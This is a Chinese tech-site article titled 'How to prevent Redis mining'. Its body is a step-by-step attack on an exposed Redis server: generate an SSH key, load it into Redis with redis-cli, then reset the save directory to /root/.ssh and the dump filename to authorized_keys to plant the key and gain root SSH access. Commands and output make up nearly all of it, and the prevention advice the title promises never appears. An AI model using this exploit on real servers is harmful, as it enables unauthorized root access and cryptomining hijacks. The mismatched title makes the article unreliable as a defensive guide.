您现在的位置是:主页 > 数据库技术 > 数据库技术

Redis挖矿怎么预防

IDCBT2022-01-13服务器技术人已围观

简介这篇“Redis挖矿怎么预防”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面

这篇“Redis挖矿怎么预防”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“Redis挖矿怎么预防”文章吧。

1、首先我们需要一些先决条件

    条件一:你首先要有一个Redis,并且我们要知道他的端口【默认6379】;

    条件二:Redis的密码不能过于复杂,或者没有密码;

    条件三:启动Redis的用户最好是Root用户,这样破坏性更大;

    2、开始搞事情

      2.1 创建一对秘钥

      通过ssh-keygen生成一对,当然可以使用已经有的都没有问题。

      root@kali:/usr/local/src# ssh-keygen 
      Generating public/private rsa key pair.
      Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

      接下来通过公钥生成攻击键值

      (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

      内容如下

      root@kali:/tmp/rediskey# cat foo.txt 
      
      ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali

      这里前后增加两个换行符是为了防止数据连接在一起造成失效问题。

        2.2 配置Key到Redis中

        操作如下:

        root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
        OK

        登录Redis进行检查,是否已经写入进Redis中。

        root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
        192.168.243.129:6379> get bar
        "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"

          2.3 通过Redis保存机制替换系统文件

          且看如下操作

          192.168.243.129:6379> config set dir /root/.ssh
          OK
          192.168.243.129:6379> config get dir
          1) "dir"
          2) "/root/.ssh"
          192.168.243.129:6379> config set dbfilename "authorized_keys"
          OK
          192.168.243.129:6379> save
          OK
          192.168.243.129:6379> exit

          标签:

          很赞哦! ()

本栏推荐